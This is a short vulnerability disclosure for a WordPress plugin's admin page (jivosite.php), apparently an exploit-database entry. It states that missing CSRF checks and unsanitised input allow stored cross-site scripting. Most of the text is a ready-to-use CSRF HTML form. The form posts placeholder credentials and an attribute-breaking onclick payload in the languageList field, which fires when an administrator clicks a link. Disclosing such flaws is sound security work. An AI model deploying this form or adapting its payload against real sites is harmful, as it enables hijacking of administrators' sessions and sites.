The plugin does not properly check CSRF tokens on POST requests to the plugins admin page, and does not sanitise some parameters, leading to a stored Cross-Site Scripting vulnerability where an attacker can trick a logged in administrator to inject arbitrary javascript.
<html>
<body>
<form method="POST" action="https://127.0.0.1/wordpress/wp-admin/admin.php?page=jivosite.php">
<input type="hidden" name="email" value="[email protected]"/>
<input type="hidden" name="userPassword" value="Test123"/>
<input type="hidden" name="userDisplayName" value="test123"/>
<input type="hidden" name="languageList" value='1337" onclick=alert(/XSS/) test="'/>
<input type="submit" value="Submit">
</form>
</body>
<html>
XSS will be triggered when admin click "Go to Web Application"